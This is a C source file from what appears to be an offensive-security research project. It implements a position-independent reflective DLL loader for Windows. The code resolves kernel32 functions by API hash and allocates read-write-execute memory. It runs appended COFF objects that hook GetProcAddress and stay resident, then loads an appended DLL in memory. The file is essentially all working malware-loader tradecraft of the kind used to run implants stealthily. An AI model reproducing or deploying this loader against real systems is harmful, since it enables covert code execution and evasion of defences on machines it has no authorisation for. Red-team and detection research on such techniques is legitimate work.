/*
 * Copyright (C) 2025 Raphael Mudge, Adversary Fan Fiction Writers Guild
 *
 * This file is part of Tradecraft Garden
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License along
 *  with this program; if not, see <https://www.gnu.org/licenses/>.
 */

/* function prototypes */
void ReflectiveLoader();

/* this is the REAL entry point to this whole mess and it needs to go first! */
__declspec(noinline) void go() {
	ReflectiveLoader();
}

/*
 * loader.h is a refactored Reflective Loader and some macros/definitions we need.
 * it has several functions intended to be used across loaders.
 */
#include "loaderdefs.h"
#include "loader.h"

/* header to run our pico! */
#include "picorun.h"

/*
 * implementations of findFunctionByHash and findModulebyHash by walking the
 * Export Address Table.
 */
#include "resolve_eat.h"

/* build a table of functions we need/want */
#define WIN32_FUNC( x ) __typeof__( x ) * x

typedef struct {
	WIN32_FUNC(LoadLibraryA);
	WIN32_FUNC(GetProcAddress);
	WIN32_FUNC(VirtualAlloc);
} WIN32FUNCS;

/*
 * Need other hashes?
 *
 * https://github.com/ihack4falafel/ROR13HashGenerator
 */
#define KERNEL32DLL_HASH	0x6A4ABC5B
#define LOADLIBRARYA_HASH	0xEC0E4E8E
#define GETPROCADDRESS_HASH	0x7C0DFCAA
#define VIRTUALALLOC_HASH	0x91AFCA54

void findNeededFunctions(WIN32FUNCS * funcs) {
	char * hModule = (char *)findModuleByHash(KERNEL32DLL_HASH);

	funcs->LoadLibraryA   = (__typeof__(LoadLibraryA) *)   findFunctionByHash(hModule, LOADLIBRARYA_HASH);
	funcs->GetProcAddress = (__typeof__(GetProcAddress) *) findFunctionByHash(hModule, GETPROCADDRESS_HASH);
 	funcs->VirtualAlloc   = (__typeof__(VirtualAlloc) *)   findFunctionByHash(hModule, VIRTUALALLOC_HASH);
}

/*
 * This is the Crystal Palace convention for getting ahold of data linked with this loader.
 */
char __DLLDATA__[0] __attribute__((section("my_data")));
char __BOFDATA__[0] __attribute__((section("my_bof")));
char __HOKDATA__[0] __attribute__((section("my_hooks")));

#ifdef WIN_X86
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)WIN_GET_CALLER(); }

char * findAppendedDLL() {
	return PTR_OFFSET(caller(), (ULONG_PTR)&__DLLDATA__ + 5);
}

char * findAppendedPICO() {
	return PTR_OFFSET(caller(), (ULONG_PTR)&__BOFDATA__ + 5);
}

char * findAppendedHOOKS() {
	return PTR_OFFSET(caller(), (ULONG_PTR)&__HOKDATA__ + 5);
}
#else
char * findAppendedDLL() {
	return (char *)&__DLLDATA__;
}

char * findAppendedPICO() {
	return (char *)&__BOFDATA__;
}

char * findAppendedHOOKS() {
	return (char *)&__HOKDATA__;
}
#endif

char * SetupCOFF(WIN32FUNCS * funcs, char * dstCode, char * srcData) {
	char * dstData;

	/* allocate memory for our PICO's data */
	dstData = funcs->VirtualAlloc( NULL, PicoDataSize(srcData), MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_READWRITE );

	/* In this project, we're pre-allocating 4096b for the .text section of each of our PICOs in-lin with our DLL.
	 * But, if that's not enough, well, we'll allocate more data then and stick everything there. */
	if (PicoCodeSize(srcData) > 4096)
		dstCode = funcs->VirtualAlloc( NULL, PicoCodeSize(srcData), MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE );

	/* load our pico into our destination address, thanks! */
	PicoLoad((IMPORTFUNCS *)funcs, srcData, dstCode, dstData);

	return dstCode;
}

/*
 * A quick COFF runner for hooks
 */
typedef void (*PICOHOOK_FUNC_3)(IMPORTFUNCS * funcs, char * dllbase, DWORD dllsz);

void RunHookCOFF(WIN32FUNCS * funcs, char * dstCode, char * dllBase, DWORD dllSize) {
	char * src = findAppendedHOOKS();
	char * dst = SetupCOFF(funcs, dstCode, src);

	/* execute our pico */
	((PICOHOOK_FUNC_3)PicoEntryPoint(src, dst)) ((IMPORTFUNCS *)funcs, dllBase, dllSize);

	/* we don't free this COFF because we want it to persist in memory, after all, it's modified
	 * our funcs->GetProcAddress to affect everything that's loaded from here on out */
}

/*
 * Get the start address of our PIC DLL loader.
 */
char * getStart() {
#ifdef WIN_X86
	return PTR_OFFSET(caller(), (ULONG_PTR)go + 5);
#else
	return (char *)go;
#endif
}

/*
 * Our PICO loader, have fun, go nuts!
 */
typedef void (*PICOMAIN_FUNC_3)(char * loader, char * dllEntry, char * dllBase);

void RunViaFreeCOFF(WIN32FUNCS * funcs, char * dstCode, char * dllEntry, char *dllBase) {
	char * src = findAppendedPICO();
	char * dst = SetupCOFF(funcs, dstCode, src);

	/* execute our pico */
	((PICOMAIN_FUNC_3)PicoEntryPoint(src, dst)) (getStart(), dllEntry, dllBase);

	/* Same thing as above, we don't care about free()ing this, because it's persistent */
}

/* This is how we're going to layout the DLL data and COFFs. The .text sections of our COFFs
 * are CRAZY small here. I'm giving each of them one page though. */
typedef struct {
	char freeandrun[4096];
	char hooks[4096];
	char dllbase[0];
} LAYOUT;

/*
 * Our reflective loader itself, have fun, go nuts!
 */
void ReflectiveLoader() {
	char       * src;
	DLLDATA      data;
	WIN32FUNCS   funcs;
	LAYOUT     * dst;

	/* find our DLL appended to this PIC */
	src = findAppendedDLL();

	/* resolve the functions we'll need */
	findNeededFunctions(&funcs);

	/* parse our DLL! */
	ParseDLL(src, &data);

	/* allocate memory for our DLL and the other stuff within our layout.  */
	dst = (LAYOUT *)funcs.VirtualAlloc( NULL, sizeof(LAYOUT) + SizeOfDLL(&data), MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE );

	/* Before we go ANY further, let's run our COFF to setup our hooks */
	RunHookCOFF(&funcs, dst->hooks, dst->dllbase, SizeOfDLL(&data));

	/* load the damned thing */
	LoadDLL(&data, src, dst->dllbase);

	/* process the imports */
	ProcessImports((IMPORTFUNCS *)&funcs, &data, dst->dllbase);

	/* pass to our BOF */
	RunViaFreeCOFF(&funcs, dst->freeandrun, (char *)EntryPoint(&data, dst->dllbase), dst->dllbase);
}
